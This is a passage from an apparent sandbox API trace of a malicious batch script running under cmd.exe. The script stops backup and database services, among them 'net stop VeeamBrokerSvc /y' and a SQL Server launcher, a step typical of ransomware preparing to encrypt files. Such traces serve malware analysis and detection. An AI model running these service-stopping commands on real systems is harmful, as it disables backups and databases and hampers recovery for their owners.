lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0047.654] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0047.654] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.654] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamBrokerSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamBrokerSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamBrokerSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x8a0, dwThreadId=0x8a4)) returned 1 [0047.659] CloseHandle (hObject=0x78) returned 1 [0047.659] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.659] GetProcessHeap () returned 0x3e0000 [0047.659] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.659] GetEnvironmentStringsW () returned 0x3f8408* [0047.659] GetProcessHeap () returned 0x3e0000 [0047.659] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.659] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.659] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0047.827] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0047.827] CloseHandle (hObject=0x74) returned 1 [0047.827] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0047.827] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.827] GetProcessHeap () returned 0x3e0000 [0047.827] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.827] GetEnvironmentStringsW () returned 0x3f8408* [0047.827] GetProcessHeap () returned 0x3e0000 [0047.827] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.827] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.827] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.827] GetProcessHeap () returned 0x3e0000 [0047.827] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.828] GetEnvironmentStringsW () returned 0x3f8408* [0047.828] GetProcessHeap () returned 0x3e0000 [0047.828] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.828] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.828] GetProcessHeap () returned 0x3e0000 [0047.828] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0047.828] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0047.828] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.828] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0047.828] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.828] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0047.828] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.828] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0047.828] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.828] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0047.829] SetConsoleInputExeNameW () returned 0x1 [0047.829] GetConsoleOutputCP () returned 0x1b5 [0047.829] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0047.829] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.829] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0047.829] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0047.829] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.829] SetFilePointer (in: hFile=0x74, lDistanceToMove=2143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x85f [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0047.829] GetProcessHeap () returned 0x3e0000 [0047.829] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0047.830] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.830] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x85f [0047.830] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1062, lpOverlapped=0x0) returned 1 [0047.830] SetFilePointer (in: hFile=0x74, lDistanceToMove=2188, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x88c [0047.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=45, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$PROFXENGAGEMENT /y\r\nÇ¥ /y\r\nlures\r\nnded\r\n") returned 45 [0047.830] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.830] GetFileType (hFile=0x74) returned 0x1 [0047.830] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.830] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x88c [0047.830] GetProcessHeap () returned 0x3e0000 [0047.830] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0047.830] GetProcessHeap () returned 0x3e0000 [0047.831] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0047.831] _tell (_FileHandle=3) returned 2188 [0047.831] _close (_FileHandle=3) returned 0 [0047.831] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.831] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.831] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.831] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.831] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.831] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.831] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.831] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.831] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.832] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.832] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.832] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.832] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.832] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.832] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.832] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.832] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.832] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.832] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.832] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.832] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.832] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.832] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.832] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.832] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.832] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.832] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.832] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.832] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.832] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.832] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.832] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.832] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.832] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.832] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.832] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.832] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.832] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.832] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.832] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.832] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.832] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.833] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0047.833] SetErrorMode (uMode=0x0) returned 0x1 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0047.833] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0047.833] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0047.833] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0047.833] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0047.833] GetProcessHeap () returned 0x3e0000 [0047.833] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0047.833] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.833] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.833] GetLastError () returned 0x2 [0047.834] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.834] GetLastError () returned 0x2 [0047.834] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.834] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.834] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.834] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.834] GetLastError () returned 0x2 [0047.834] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.834] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.834] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.835] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0047.835] SetErrorMode (uMode=0x0) returned 0x1 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0047.835] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0047.835] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0047.835] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0047.835] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0047.835] GetProcessHeap () returned 0x3e0000 [0047.835] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0047.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.835] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.836] GetLastError () returned 0x2 [0047.836] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.836] GetLastError () returned 0x2 [0047.836] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.836] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0047.836] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.836] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.836] GetLastError () returned 0x2 [0047.836] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0047.836] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.836] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.837] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0047.837] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0047.837] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0047.837] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.837] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$PROFXENGAGEMENT /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$PROFXENGAGEMENT /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$PROFXENGAGEMENT /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa14, dwThreadId=0xa08)) returned 1 [0047.842] CloseHandle (hObject=0x74) returned 1 [0047.842] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.842] GetProcessHeap () returned 0x3e0000 [0047.842] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.842] GetEnvironmentStringsW () returned 0x3f8408* [0047.842] GetProcessHeap () returned 0x3e0000 [0047.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.842] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.842] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0047.978] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0047.978] CloseHandle (hObject=0x78) returned 1 [0047.978] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0047.978] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.978] GetProcessHeap () returned 0x3e0000 [0047.978] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.978] GetEnvironmentStringsW () returned 0x3f8408* [0047.978] GetProcessHeap () returned 0x3e0000 [0047.978] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.979] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.979] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.979] GetProcessHeap () returned 0x3e0000 [0047.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.979] GetEnvironmentStringsW () returned 0x3f8408* [0047.979] GetProcessHeap () returned 0x3e0000 [0047.979] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.979] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.979] GetProcessHeap () returned 0x3e0000 [0047.979] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0047.979] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0047.979] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.979] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0047.979] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.979] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0047.979] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.979] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0047.979] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.980] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0047.980] SetConsoleInputExeNameW () returned 0x1 [0047.980] GetConsoleOutputCP () returned 0x1b5 [0047.980] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0047.980] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.980] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0047.980] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0047.980] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.980] SetFilePointer (in: hFile=0x78, lDistanceToMove=2188, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x88c [0047.980] GetProcessHeap () returned 0x3e0000 [0047.980] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0047.980] GetProcessHeap () returned 0x3e0000 [0047.980] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0047.980] GetProcessHeap () returned 0x3e0000 [0047.980] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0047.981] GetProcessHeap () returned 0x3e0000 [0047.981] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 